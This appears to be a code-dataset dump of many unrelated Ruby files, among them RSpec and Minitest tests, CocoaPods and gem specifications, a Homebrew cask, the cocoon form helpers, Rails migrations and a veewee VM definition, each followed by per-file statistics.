          up_one_href = "../#{href}"
          @up_one_href_idref[up_one_href] = idref
        end
        @up_one_href_idref
      end

      # Memoized idref => 1-based spine position over the spine itemrefs.
      def idref_index
        return @idref_index unless @idref_index.nil?
        @idref_index = {}
        index = 0
        @content_doc.xpath(".//spine/itemref").each do |itemref|
          idref = itemref.attribute('idref').value
          index += 1
          @idref_index[idref] = index if idref.present?
        end
        @idref_index
      end
    end

    # Null object: a Content built from the null Rootfile and an empty path.
    class ContentNullObject < Content
      private_class_method :new

      private

      def initialize
        super(Rootfile.null_object, '')
      end
    end
  end
end
| 29.549618 | 124 | 0.592353 |
8759d339b20c71380f084af34fffe7c1dd37430a | 1,494 | cask 'unison' do
# Older macOS releases require older Unison builds: pick version, checksum and
# download host according to the running OS version.
if MacOS.version <= :mountain_lion
  version '2.40.69'
  sha256 '2bcc460511f2b43fa1613cc5f9ba4dd59bb12d40b5b9fb2e9f21adaf854bcf3b'

  # unison-binaries.inria.fr was verified as official when first introduced to the cask
  url "https://unison-binaries.inria.fr/files/Unison-#{version}_x64.dmg"
elsif MacOS.version <= :yosemite
  version '2.48.3'
  sha256 'd578196d8b38f35c1e0410a1c86ff4e115a91f7eb211201db7a940a3a3e0f099'

  # github.com/bcpierce00/unison/releases/download was verified as official when first introduced to the cask
  url "https://github.com/bcpierce00/unison/releases/download/#{version}/Unison-OS-X-#{version}.zip"
else
  version '2.51.2'
  sha256 '0738a6978fa29bb2af409322069cc20df293b770877942ac4b8774f06e774aa5'

  # github.com/bcpierce00/unison/releases/download was verified as official when first introduced to the cask
  url "https://github.com/bcpierce00/unison/releases/download/v#{version}/Unison-#{version}.OS.X.zip"
end

appcast 'https://github.com/bcpierce00/unison/releases.atom',
        checkpoint: 'd3bc408807276d276906f10771f8332609da1f99de651937f256666db8268737'
name 'Unison'
homepage 'https://www.cis.upenn.edu/~bcpierce/unison/'

# The Homebrew formula installs the same `unison` binary name.
conflicts_with formula: 'unison'

app 'Unison.app'
# Expose the app's embedded CLI tool on PATH as `unison`.
binary "#{appdir}/Unison.app/Contents/MacOS/cltool", target: 'unison'

# Disable the app's own "install cltool" prompt after installation.
postflight do
  system_command '/usr/bin/defaults', args: ['write', 'edu.upenn.cis.Unison', 'CheckCltool', '-bool', 'false']
end
end
| 41.5 | 112 | 0.754351 |
bbdd9762d829d7478e93d98767f81074846a57a7 | 1,549 | Pod::Spec.new do |s|
# CocoaPods specification for RainbowNavigationOC (iOS 8+, ARC).
# Commented-out lines below are retained template/alternative options.
s.name = "RainbowNavigationOC"
s.version = "1.0.0"
s.summary = "它允许你在各种情况下动画改变UINavigationBar的backgroundColor。"
s.homepage = "https://github.com/timRabbit/RainbowNavigationOC"
s.social_media_url = "https://github.com/timRabbit/RainbowNavigationOC"
s.platform = :ios,'8.0'
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { " tim" => "[email protected]" }
s.source = { :git => "https://github.com/timRabbit/RainbowNavigationOC.git",:tag => s.version.to_s }
s.ios.deployment_target = "8.0"
s.requires_arc = true
s.framework = "CoreFoundation","Foundation","CoreGraphics","Security","UIKit"
s.library = "z.1.1.3","stdc++","sqlite3"
s.source_files = 'RainbowNavigation'
#s.resources = 'SIDADView/*.{bundle}'
# s.dependency 'XAspect'
# s.dependency 'TimCore/TimCore','~>1.2.12'
# s.dependency 'JPush-iOS-SDK','~>3.0.2'
# s.ios.frameworks = 'UserNotifications'
# s.subspec 'YMCitySelect' do |sp|
# sp.source_files = 'YMCitySelect/*.{h,m,mm}'
# sp.resources = "Extend/**/*.{png}"
# sp.requires_arc = true
# sp.xcconfig = { 'HEADER_SEARCH_PATHS' => '$(SDKROOT)/usr/include/libz, $(SDKROOT)/usr/include/libxml2', 'CLANG_CXX_LANGUAGE_STANDARD' => 'gnu++0x', 'CLANG_CXX_LIBRARY' => 'libstdc++', 'CLANG_WARN_DIRECT_OBJC_ISA_USAGE' => 'YES'}
# sp.dependency 'FontIcon'
# sp.prefix_header_contents = '#import "EasyIOS.h"'
# end
end
| 45.558824 | 232 | 0.610717 |
e9802998170065d5956e20cf98cbc4c1e49ef0a0 | 1,362 | # Copyright (c) 2009-2011 Cyril Rohr, INRIA Rennes - Bretagne Atlantique
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
# Controller specs for GET /network_equipments: the index action should
# respond 200 and expose the expected collection sizes, globally and per site.
describe NetworkEquipmentsController do
  render_views

  describe 'GET /network_equipments' do
    it 'should get 200 in default' do
      get :index, params: { format: :json }
      expect(response.status).to eq(200)
    end

    it 'should get collection' do
      get :index, params: { format: :json }
      expect(response.status).to eq(200)
      # The reference data set contains 9 network equipments in total.
      expect(json['total']).to eq(9)
      expect(json['items'].length).to eq(9)
    end

    it 'should get collection for a site' do
      get :index, params: { site_id: 'lille', format: :json }
      expect(response.status).to eq(200)
      # NOTE(review): presumably 3 of the fixtures belong to site 'lille'.
      expect(json['total']).to eq(3)
      expect(json['items'].length).to eq(3)
    end
  end # describe "GET /network_equipments"
end
| 33.219512 | 74 | 0.697504 |
7a42d297317238246bc8e996ed40fa15be479e27 | 26 | require_relative 'client'
| 13 | 25 | 0.846154 |
e9664661777194335e4bea8102bf3dea7ec5848b | 1,097 |
#
# testing ruote
#
# Thu Dec 24 18:05:39 JST 2009
#
require File.join(File.dirname(__FILE__), 'base')
# Functional tests for the engine's add_service: services can be registered
# by class path or as pre-built instances, with an optional options hash.
class FtAddServiceTest < Test::Unit::TestCase
  include FunctionalBase

  # Minimal service double: records the context and options it is built with.
  class MyService
    attr_reader :context, :options
    def initialize(context, options={})
      @context = context
      @options = options
    end
  end

  # Registering by (name, require path, class name) instantiates the class.
  def test_as_path_class
    @engine.add_service('toto', 'ruote', 'FtAddServiceTest::MyService')
    assert_equal MyService, @engine.context.toto.class
  end

  # Registering a ready-made instance stores it as-is.
  def test_as_instance
    @engine.add_service('toto', MyService.new(nil))
    assert_equal MyService, @engine.context.toto.class
  end

  # A trailing options hash is passed through to the service constructor.
  def test_as_path_class_options
    @engine.add_service(
      'toto', 'ruote', 'FtAddServiceTest::MyService', 'colour' => 'blue')
    assert_equal MyService, @engine.context.toto.class
    assert_equal 'blue', @engine.context.toto.options['colour']
  end

  # add_service returns the service object it registered.
  def test_add_service_returns_service
    toto = @engine.add_service(
      'toto', 'ruote', 'FtAddServiceTest::MyService', 'colour' => 'blue')
    assert_equal MyService, toto.class
  end
end
| 19.245614 | 73 | 0.698268 |
03076003f239d4216b4b1cacc9851fc38bd3bb5d | 4,375 | require 'spec_helper'
# Specs for Neo4j::Shared::Property: illegal-property guards, undef_property
# cleanup, timestamp type resolution, custom typecasters and custom
# serializer/type-converter registration.
describe Neo4j::Shared::Property do
  let(:clazz) { Class.new { include Neo4j::Shared::Property } }

  describe ':property class method' do
    it 'raises an error when passing illegal properties' do
      Neo4j::Shared::DeclaredProperty::ILLEGAL_PROPS.push 'foo'
      expect { clazz.property :foo }.to raise_error(Neo4j::Shared::DeclaredProperty::IllegalPropertyError)
    end
  end

  describe '.undef_property' do
    before(:each) do
      clazz.property :bar

      expect(clazz).to receive(:undef_constraint_or_index)
      clazz.undef_property :bar
    end

    # Reader, writer and predicate methods should all be removed.
    it 'removes methods' do
      clazz.method_defined?(:bar).should be false
      clazz.method_defined?(:bar=).should be false
      clazz.method_defined?(:bar?).should be false
    end
  end

  describe 'types for timestamps' do
    context 'when type is undefined inline' do
      before do
        clazz.property :created_at
        clazz.property :updated_at
      end

      it 'defaults to DateTime' do
        expect(clazz.attributes[:created_at][:type]).to eq(DateTime)
        expect(clazz.attributes[:updated_at][:type]).to eq(DateTime)
      end

      context '...and specified in config' do
        before do
          Neo4j::Config[:timestamp_type] = Integer
          clazz.property :created_at
          clazz.property :updated_at
        end

        it 'uses type set in config' do
          expect(clazz.attributes[:created_at][:type]).to eq(Integer)
          expect(clazz.attributes[:updated_at][:type]).to eq(Integer)
        end
      end
    end

    context 'when type is defined' do
      before do
        clazz.property :created_at, type: Date
        clazz.property :updated_at, type: Date
      end

      it 'does not change type' do
        expect(clazz.attributes[:created_at][:type]).to eq(Date)
        expect(clazz.attributes[:updated_at][:type]).to eq(Date)
      end
    end

    context 'for Time type' do
      before do
        clazz.property :created_at, type: Time
        clazz.property :updated_at, type: Time
      end

      # ActiveAttr does not know what to do with Time, so it is stored as Int.
      it 'tells ActiveAttr it is an Integer' do
        expect(clazz.attributes[:created_at][:type]).to eq(Integer)
        expect(clazz.attributes[:updated_at][:type]).to eq(Integer)
      end
    end
  end

  describe '#typecasting' do
    context 'with custom typecaster' do
      let(:typecaster) do
        Class.new do
          def call(value)
            value.to_s.upcase
          end
        end
      end
      let(:instance) { clazz.new }

      before do
        allow(clazz).to receive(:extract_association_attributes!)
        clazz.property :some_property, typecaster: typecaster.new
      end

      it 'uses custom typecaster' do
        instance.some_property = 'test'
        expect(instance.some_property).to eq('TEST')
      end
    end
  end

  describe '#custom type converter' do
    # Converter mapping Range <-> String ("1..3") for DB round-trips.
    let(:converter) do
      Class.new do
        class << self
          def convert_type
            Range
          end

          def to_db(value)
            value.to_s
          end

          def to_ruby(value)
            ends = value.to_s.split('..').map { |d| Integer(d) }
            ends[0]..ends[1]
          end
        end
      end
    end

    let(:clazz) { Class.new { include Neo4j::ActiveNode } }
    let(:instance) { clazz.new }
    let(:range) { 1..3 }

    before do
      clazz.property :range, serializer: converter
    end

    it 'sets active_attr typecaster to ObjectTypecaster' do
      expect(clazz.attributes[:range][:typecaster]).to be_a(ActiveAttr::Typecasting::ObjectTypecaster)
    end

    it 'adds new converter' do
      expect(Neo4j::Shared::TypeConverters.converters[Range]).to eq(converter)
    end

    it 'returns object of a proper type' do
      instance.range = range
      expect(instance.range).to be_a(Range)
    end

    it 'uses type converter to serialize node' do
      instance.range = range
      expect(instance.class.declared_property_manager.convert_properties_to(instance, :db, instance.props)[:range]).to eq(range.to_s)
    end

    it 'uses type converter to deserialize node' do
      instance.range = range.to_s
      expect(instance.class.declared_property_manager.convert_properties_to(instance, :ruby, instance.props)[:range]).to eq(range)
    end
  end
end
| 28.225806 | 133 | 0.633829 |
91f7153a979f08587cb84dd5dbbe1a84c55c540d | 7,297 | module Cocoon
module ViewHelpers
# this will show a link to remove the current association. This should be placed inside the partial.
# either you give
# - *name* : the text of the link
# - *f* : the form this link should be placed in
# - *html_options*: html options to be passed to link_to (see <tt>link_to</tt>)
#
# or you use the form without *name* with a *&block*
# - *f* : the form this link should be placed in
# - *html_options*: html options to be passed to link_to (see <tt>link_to</tt>)
# - *&block*: the output of the block will be show in the link, see <tt>link_to</tt>
def link_to_remove_association(*args, &block)
if block_given?
link_to_remove_association(capture(&block), *args)
elsif args.first.respond_to?(:object)
form = args.first
association = form.object.class.to_s.tableize
name = I18n.translate("cocoon.#{association}.remove", default: I18n.translate('cocoon.defaults.remove'))
link_to_remove_association(name, *args)
else
name, f, html_options = *args
html_options ||= {}
is_dynamic = f.object.new_record?
classes = []
classes << "remove_fields"
classes << (is_dynamic ? 'dynamic' : 'existing')
classes << 'destroyed' if f.object.marked_for_destruction?
html_options[:class] = [html_options[:class], classes.join(' ')].compact.join(' ')
wrapper_class = html_options.delete(:wrapper_class)
html_options[:'data-wrapper-class'] = wrapper_class if wrapper_class.present?
hidden_field_tag("#{f.object_name}[_destroy]", f.object._destroy) + link_to(name, '#', html_options)
end
end
# :nodoc:
def render_association(association, f, new_object, form_name, render_options={}, custom_partial=nil)
partial = get_partial_path(custom_partial, association)
locals = render_options.delete(:locals) || {}
ancestors = f.class.ancestors.map{|c| c.to_s}
method_name = ancestors.include?('SimpleForm::FormBuilder') ? :simple_fields_for : (ancestors.include?('Formtastic::FormBuilder') ? :semantic_fields_for : :fields_for)
f.send(method_name, association, new_object, {:child_index => "new_#{association}"}.merge(render_options)) do |builder|
partial_options = {form_name.to_sym => builder, :dynamic => true}.merge(locals)
render(partial, partial_options)
end
end
# shows a link that will allow to dynamically add a new associated object.
#
# - *name* : the text to show in the link
# - *f* : the form this should come in (the formtastic form)
# - *association* : the associated objects, e.g. :tasks, this should be the name of the <tt>has_many</tt> relation.
# - *html_options*: html options to be passed to <tt>link_to</tt> (see <tt>link_to</tt>)
# - *:render_options* : options passed to `simple_fields_for, semantic_fields_for or fields_for`
# - *:locals* : the locals hash in the :render_options is handed to the partial
# - *:partial* : explicitly override the default partial name
# - *:wrap_object* : a proc that will allow to wrap your object, especially suited when using
# decorators, or if you want special initialisation
# - *:form_name* : the parameter for the form in the nested form partial. Default `f`.
# - *:count* : Count of how many objects will be added on a single click. Default `1`.
# - *&block*: see <tt>link_to</tt>
def link_to_add_association(*args, &block)
if block_given?
link_to_add_association(capture(&block), *args)
elsif args.first.respond_to?(:object)
association = args.second
name = I18n.translate("cocoon.#{association}.add", default: I18n.translate('cocoon.defaults.add'))
link_to_add_association(name, *args)
else
name, f, association, html_options = *args
html_options ||= {}
render_options = html_options.delete(:render_options)
render_options ||= {}
override_partial = html_options.delete(:partial)
wrap_object = html_options.delete(:wrap_object)
force_non_association_create = html_options.delete(:force_non_association_create) || false
form_parameter_name = html_options.delete(:form_name) || 'f'
count = html_options.delete(:count).to_i
html_options[:class] = [html_options[:class], "add_fields"].compact.join(' ')
html_options[:'data-association'] = association.to_s.singularize
html_options[:'data-associations'] = association.to_s.pluralize
new_object = create_object(f, association, force_non_association_create)
new_object = wrap_object.call(new_object) if wrap_object.respond_to?(:call)
html_options[:'data-association-insertion-template'] = CGI.escapeHTML(render_association(association, f, new_object, form_parameter_name, render_options, override_partial).to_str).html_safe
html_options[:'data-count'] = count if count > 0
link_to(name, '#', html_options)
end
end
# creates new association object with its conditions, like
# `` has_many :admin_comments, class_name: "Comment", conditions: { author: "Admin" }
# will create new Comment with author "Admin"
def create_object(f, association, force_non_association_create=false)
assoc = f.object.class.reflect_on_association(association)
assoc ? create_object_on_association(f, association, assoc, force_non_association_create) : create_object_on_non_association(f, association)
end
def get_partial_path(partial, association)
partial ? partial : association.to_s.singularize + "_fields"
end
private
def create_object_on_non_association(f, association)
builder_method = %W{build_#{association} build_#{association.to_s.singularize}}.select { |m| f.object.respond_to?(m) }.first
return f.object.send(builder_method) if builder_method
raise "Association #{association} doesn't exist on #{f.object.class}"
end
def create_object_on_association(f, association, instance, force_non_association_create)
if instance.class.name == "Mongoid::Relations::Metadata" || force_non_association_create
create_object_with_conditions(instance)
else
assoc_obj = nil
# assume ActiveRecord or compatible
if instance.collection?
assoc_obj = f.object.send(association).build
f.object.send(association).delete(assoc_obj)
else
assoc_obj = f.object.send("build_#{association}")
f.object.send(association).delete
end
assoc_obj = assoc_obj.dup if assoc_obj.frozen?
assoc_obj
end
end
def create_object_with_conditions(instance)
# in rails 4, an association is defined with a proc
# and I did not find how to extract the conditions from a scope
# except building from the scope, but then why not just build from the
# association???
conditions = instance.respond_to?(:conditions) ? instance.conditions.flatten : []
instance.klass.new(*conditions)
end
end
end
| 45.60625 | 197 | 0.66959 |
# frozen_string_literal: true
# Test bootstrap: loads the gem under test and applies project-wide RSpec
# configuration.
require "omni_attributes"
RSpec.configure do |config|
  # Enable flags like --only-failures and --next-failure
  config.example_status_persistence_file_path = ".rspec_status"
  # Disable RSpec exposing methods globally on `Module` and `main`
  config.disable_monkey_patching!
  # Only the modern expect(...) syntax is allowed (no `should`).
  config.expect_with :rspec do |c|
    c.syntax = :expect
  end
end
| 23.625 | 66 | 0.759259 |
class User < ApplicationRecord
  # Include default devise modules. Others available are:
  # :confirmable, :lockable, :timeoutable and :omniauthable
  devise :database_authenticatable, :registerable,
         :recoverable, :rememberable, :trackable, :validatable
  has_many :articles
  has_many :comments
  include PermissionsConcern

  # Returns the Gravatar image URL for this user.
  # Gravatar identifies an account by the MD5 hex digest of the downcased
  # email address. (Previously this assigned the URL to a useless local
  # variable and used redundant `self.` receivers.)
  def avatar
    hash = Digest::MD5.hexdigest(email.downcase)
    "https://www.gravatar.com/avatar/#{hash}"
  end
end
| 28.428571 | 63 | 0.726968 |
# mundi_api
#
# This file was automatically generated by APIMATIC v2.0 (
# https://apimatic.io ).
module MundiApi
  # Request model carrying the updatable attributes of a seller.
  class UpdateSellerRequest < BaseModel
    # Seller name
    # @return [String]
    attr_accessor :name
    # Seller code
    # @return [String]
    attr_accessor :code
    # Seller description
    # @return [String]
    attr_accessor :description
    # Seller document CPF or CNPJ
    # @return [String]
    attr_accessor :document
    # Seller status
    # @return [String]
    attr_accessor :status
    # Seller type
    # @return [String]
    attr_accessor :type
    # Seller address
    # @return [CreateAddressRequest]
    attr_accessor :address
    # Arbitrary metadata key/value pairs
    # @return [Array<String, String>]
    attr_accessor :metadata
    # The model properties; each wire name equals the model name here.
    PROPERTY_NAMES = %w[name code description document status type address metadata].freeze
    # A mapping from model property names to API property names.
    def self.names
      @_hash = {} if @_hash.nil?
      PROPERTY_NAMES.each { |property| @_hash[property] = property }
      @_hash
    end
    def initialize(name = nil,
                   code = nil,
                   description = nil,
                   document = nil,
                   status = nil,
                   type = nil,
                   address = nil,
                   metadata = nil)
      @name = name
      @code = code
      @description = description
      @document = document
      @status = status
      @type = type
      @address = address
      @metadata = metadata
    end
    # Creates an instance of the object from a hash; returns nil for a nil
    # or false hash.
    def self.from_hash(hash)
      return nil unless hash
      address = hash['address'] ? CreateAddressRequest.from_hash(hash['address']) : nil
      new(hash['name'],
          hash['code'],
          hash['description'],
          hash['document'],
          hash['status'],
          hash['type'],
          address,
          hash['metadata'])
    end
  end
end
| 26.69 | 67 | 0.520045 |
describe 'common/element/window' do
  # Sanity check run before the first test: the catalog page must be shown.
  def before_first
    screen.must_equal catalog
  end
  t 'before_first' do
    before_first
  end
  t 'window_size' do
    size = window_size
    # Width/height come back as integers (Fixnum on the Ruby versions this
    # suite targets).
    size.width.class.must_equal Fixnum
    size.height.class.must_equal Fixnum
  end
end
| 16.9375 | 39 | 0.723247 |
Veewee::Session.declare({
  # Virtual hardware for the basebox.
  :cpu_count => '1', :memory_size=> '384',
  :disk_size => '10140', :disk_format => 'VDI', :hostiocache => 'off', :ioapic => 'on', :pae => 'on',
  :os_type_id => 'RedHat_64',
  # Installation media: CentOS 5.9 x86_64 DVD (disc 1), verified by MD5.
  :iso_file => "CentOS-5.9-x86_64-bin-DVD-1of2.iso",
  :iso_src => "http://mirrors.kernel.org/centos/5.9/isos/x86_64/CentOS-5.9-x86_64-bin-DVD-1of2.iso",
  :iso_md5 => "c8caaa18400dfde2065d8ef58eb9e9bf",
  :iso_download_timeout => 10000000,
  # Kickstart-driven text install: %IP%/%PORT% are filled in by veewee,
  # which serves ks.cfg over HTTP on :kickstart_port.
  :boot_wait => "10", :boot_cmd_sequence => [ 'linux text ks=http://%IP%:%PORT%/ks.cfg<Enter>' ],
  :kickstart_port => "7122", :kickstart_timeout => 10000, :kickstart_file => "ks.cfg",
  # SSH access used for post-install provisioning.
  :ssh_login_timeout => "10000", :ssh_user => "vagrant", :ssh_password => "vagrant", :ssh_key => "",
  :ssh_host_port => "7222", :ssh_guest_port => "22",
  :sudo_cmd => "echo '%p'|sudo -S sh '%f'",
  :shutdown_cmd => "/sbin/halt -h -p",
  :postinstall_files => [ "postinstall.sh"], :postinstall_timeout => 10000000
})
| 55.588235 | 101 | 0.64127 |
Gem::Specification.new do |s|
  s.name        = "google-protobuf"
  s.version     = "3.12.3"
  git_tag       = "v#{s.version.to_s.sub('.rc.', '-rc')}" # Converts X.Y.Z.rc.N to vX.Y.Z-rcN, used for the git tag
  s.licenses    = ["BSD-3-Clause"]
  s.summary     = "Protocol Buffers"
  s.description = "Protocol Buffers are Google's data interchange format."
  s.homepage    = "https://developers.google.com/protocol-buffers"
  s.authors     = ["Protobuf Authors"]
  s.email       = "[email protected]"
  s.metadata    = { "source_code_uri" => "https://github.com/protocolbuffers/protobuf/tree/#{git_tag}/ruby" }
  s.require_paths = ["lib"]
  s.files       = Dir.glob('lib/**/*.rb')
  # JRuby ships a prebuilt jar; every other platform compiles the C extension.
  if RUBY_PLATFORM == "java"
    s.platform  = "java"
    s.files     += ["lib/google/protobuf_java.jar"]
  else
    s.files     += Dir.glob('ext/**/*')
    s.extensions= ["ext/google/protobuf_c/extconf.rb"]
    s.add_development_dependency "rake-compiler-dock", ">= 1.0.1", "< 2.0"
  end
  s.test_files  = ["tests/basic.rb",
                  "tests/stress.rb",
                  "tests/generated_code_test.rb"]
  s.required_ruby_version = '>= 2.3'
  s.add_development_dependency "rake-compiler", "~> 1.1.0"
  s.add_development_dependency "test-unit", '~> 3.0', '>= 3.0.9'
  s.add_development_dependency "rubygems-tasks", "~> 0.2.4"
end
| 44.2 | 115 | 0.616139 |
require 'minitest/autorun'
require_relative 'hamming'
# Common test data version: 2.2.0 4c453c8
# Exercism "Hamming" exercise suite: Hamming.compute must count the
# positions at which two equal-length DNA strands differ, and raise
# ArgumentError when the strands have different lengths.
class HammingTest < Minitest::Test
  def test_empty_strands
    #skip
    assert_equal 0, Hamming.compute('', '')
  end
  def test_single_letter_identical_strands
    #skip
    assert_equal 0, Hamming.compute('A', 'A')
  end
  def test_single_letter_different_strands
    #skip
    assert_equal 1, Hamming.compute('G', 'T')
  end
  def test_long_identical_strands
    #skip
    assert_equal 0, Hamming.compute('GGACTGAAATCTG', 'GGACTGAAATCTG')
  end
  def test_long_different_strands
    #skip
    assert_equal 9, Hamming.compute('GGACGGATTCTG', 'AGGACGGATTCT')
  end
  def test_disallow_first_strand_longer
    #skip
    assert_raises(ArgumentError) do
      Hamming.compute('AATG', 'AAA')
    end
  end
  def test_disallow_second_strand_longer
    #skip
    assert_raises(ArgumentError) do
      Hamming.compute('ATA', 'AGTG')
    end
  end
end
| 21.111111 | 69 | 0.716842 |
class ConfirmExistingUsers < SeedMigration::Migration
  # Confirms every user that was never confirmed, suppressing the
  # confirmation email Devise would otherwise enqueue.
  def up
    User.where(confirmed_at: nil).find_each do |unconfirmed_user|
      unconfirmed_user.skip_confirmation!
      unconfirmed_user.skip_confirmation_notification!
      unconfirmed_user.save
    end
  end

  # Data migration cannot be reversed; intentionally a no-op.
  def down
  end
end
| 17.357143 | 53 | 0.711934 |
$simport.r 'iek/rgss3_ext/plane', '1.0.0', 'Extends Plane Class'

class Plane
  # Planes don't ship with an #update method, which usually causes a few
  # 'gotchas!' when they are treated like sprites; define a harmless no-op.
  def update
  end

  ##
  # Disposes the attached bitmap unconditionally.
  # @return [Void]
  def dispose_bitmap
    bitmap.dispose
  end

  ##
  # Disposes the bitmap only when one is attached and not yet disposed.
  # @return [Void]
  def dispose_bitmap_safe
    return unless bitmap && !bitmap.disposed?
    dispose_bitmap
  end

  ##
  # Disposes the bitmap (safely) and then the plane itself.
  # @return [Void]
  def dispose_all
    dispose_bitmap_safe
    dispose
  end
end
| 16.888889 | 76 | 0.66886 |
#
# Author:: Christopher Walters (<[email protected]>)
# Author:: Mark Anderson (<[email protected]>)
# Copyright:: Copyright (c) 2010-2011 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'rubygems'
$:.unshift(File.expand_path("../../ext/dep_gecode", __FILE__))
require 'dep_selector'
require 'pp'
RSpec.configure do |config|
  config.run_all_when_everything_filtered = true
  # NOTE(review): this option is from the RSpec 2 era — confirm it is still
  # recognized by the RSpec version in the Gemfile.
  config.treat_symbols_as_metadata_keys_with_true_values = true
  config.filter_run :focus => true
  # Examples needing external services are opt-in only.
  config.filter_run_excluding :external => true
  # Tests that randomly fail, but may have value.
  config.filter_run_excluding :volatile => true
end
# Populates +dep_graph+ from +cset+, a list of cookbook-version hashes of
# the shape {"key" => [package_name, version_string],
#            "value" => {dep_name => constraint_string, ...}}.
# Each entry adds a PackageVersion and its dependency constraints.
def setup_constraint(dep_graph, cset)
  cset.each do |cb_version|
    package_name = cb_version["key"].first
    version = DepSelector::Version.new(cb_version["key"].last)
    dependencies = cb_version['value']
    pv = dep_graph.package(package_name).add_version(version)
    dependencies.each_pair do |dep_name, constraint_str|
      constraint = DepSelector::VersionConstraint.new(constraint_str)
      pv.dependencies << DepSelector::Dependency.new(dep_graph.package(dep_name), constraint)
    end
  end
end
# Maps [[package_name, constraint_string], ...] to SolutionConstraint
# objects against +dep_graph+.
# NOTE(review): `elt.shift` mutates the caller's inner arrays — they are
# emptied after this call; confirm no caller relies on them afterwards.
def setup_soln_constraints(dep_graph, soln_constraints)
  soln_constraints.map do |elt|
    pkg = dep_graph.package(elt.shift)
    constraint = DepSelector::VersionConstraint.new(elt.shift)
    DepSelector::SolutionConstraint.new(pkg, constraint)
  end
end
# Asserts that +observed+ (name => Version) matches +expected+
# ([[name, version_string], ...]) after wrapping the strings in
# DepSelector::Version. Uses the legacy `should` expectation syntax.
def verify_solution(observed, expected)
  versions = expected.inject({}){|acc, elt| acc[elt.first]=DepSelector::Version.new(elt.last) ; acc}
  observed.should == versions
end
| 34.419355 | 100 | 0.754452 |
# frozen_string_literal: true
module Vnstat
  module Traffic
    ##
    # Collection wrapper around the tracked "top" traffic results.
    class Tops < Base
      ##
      # Iterates over all results in the collection.
      #
      # @overload each
      #   @return [Enumerator]
      #
      # @overload each(&block)
      #   @yield [result]
      #   @yieldparam [Result::Minute] result
      def each(&block)
        to_a.each(&block)
      end

      ##
      # Random access into the materialized collection.
      #
      # @param [Integer] index The index of the entry in the collection.
      # @return [Result::Minute]
      def [](index)
        to_a[index]
      end

      ##
      # Materializes every <top> XML element into a result object.
      #
      # @return [Array<Result::Minute>]
      def to_a
        traffic_data.xpath('tops/top').map do |top_element|
          Result::Minute.extract_from_xml_element(top_element)
        end
      end
    end
  end
end
| 22.666667 | 72 | 0.561975 |
class AddResetPasswordFields < ActiveRecord::Migration[6.0]
  def change
    # Token consumed by the password-reset flow; nil until a reset is requested.
    add_column :users, :reset_password_token, :string, default: nil
    add_column :users, :reset_password_token_expires_at, :datetime, default: nil
    # Speeds up looking a user up by token when a reset link is visited.
    add_index :users, :reset_password_token
  end
end
| 34.625 | 80 | 0.772563 |
class CreateIntegrations < ActiveRecord::Migration
  def self.up
    create_table :integrations do |t|
      t.belongs_to :conference
      t.integer :integration_type
      t.string :key
      t.string :url
      t.string :integration_config_key
      t.timestamps
    end
    add_foreign_key :integrations, :conferences
    # A conference may have at most one integration of each type.
    add_index :integrations, [:conference_id, :integration_type], unique: true
  end
  def self.down
    drop_table :integrations
  end
end
| 22.142857 | 78 | 0.705376 |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Derive the source location from the react-native package version:
# published versions are fetched by git tag, the dev placeholder version
# (1000.0.0) by the current commit.
package = JSON.parse(File.read(File.expand_path('../../package.json', __dir__)))
version = package['version']
source = { :git => ENV['INSTALL_YOGA_FROM_LOCATION'] || 'https://github.com/facebook/react-native.git' }
if version == '1000.0.0'
  # This is an unpublished version, use the latest commit hash of the react-native repo, which we're presumably in.
  source[:commit] = `git rev-parse HEAD`.strip
else
  source[:tag] = "v#{version}"
end
Pod::Spec.new do |spec|
  spec.name = 'Yoga'
  spec.version = '1.14.0'
  spec.license = { :type => 'MIT' }
  spec.homepage = 'https://yogalayout.com'
  spec.documentation_url = 'https://yogalayout.com/docs/'
  spec.summary = 'Yoga is a cross-platform layout engine which implements Flexbox.'
  spec.description = 'Yoga is a cross-platform layout engine enabling maximum collaboration within your team by implementing an API many designers are familiar with, and opening it up to developers across different platforms.'
  spec.authors = 'Facebook'
  spec.source = source
  spec.module_name = 'yoga'
  spec.header_dir = 'yoga'
  spec.requires_arc = false
  spec.pod_target_xcconfig = {
    'DEFINES_MODULE' => 'YES'
  }
  spec.compiler_flags = [
    '-fno-omit-frame-pointer',
    '-fexceptions',
    '-Wall',
    '-Werror',
    '-std=c++1y',
    '-fPIC'
  ]
  # Pinning to the same version as React.podspec.
  spec.platforms = { :ios => "10.0", :tvos => "10.0", :osx => "10.14" }
  # Set this environment variable when *not* using the `:path` option to install the pod.
  # E.g. when publishing this spec to a spec repo.
  source_files = 'yoga/**/*.{cpp,h}'
  source_files = File.join('ReactCommon/yoga', source_files) if ENV['INSTALL_YOGA_WITHOUT_PATH_OPTION']
  spec.source_files = source_files
  header_files = 'yoga/{Yoga,YGEnums,YGMacros,YGValue}.h'
  header_files = File.join('ReactCommon/yoga', header_files) if ENV['INSTALL_YOGA_WITHOUT_PATH_OPTION']
  spec.public_header_files = header_files
end
| 37.034483 | 226 | 0.698324 |
Gem::Specification.new do |s|
  s.name        = 'hebruby'
  s.version     = '2.1.0'
  s.date        = '2016-05-20'
  s.summary     = 'Convert Hebrew dates to/from Julian dates'
  s.description = 'Convert Hebrew dates to/from Julian dates'
  s.authors     = ['Ron Evans']
  s.email       = '[email protected]'
  s.files       = ['lib/hebruby.rb']
  s.homepage    = 'http://rubygems.org/gems/hebruby'
  s.license     = 'MIT'
end
| 30.714286 | 61 | 0.57907 |
class Admin::DocsController < Admin::BaseController
  before_action :verify_editor
  respond_to :html, only: ['new', 'edit', 'create']
  respond_to :js, only: ['destroy']

  # GET /admin/docs/new — builds a new doc, optionally seeded with a
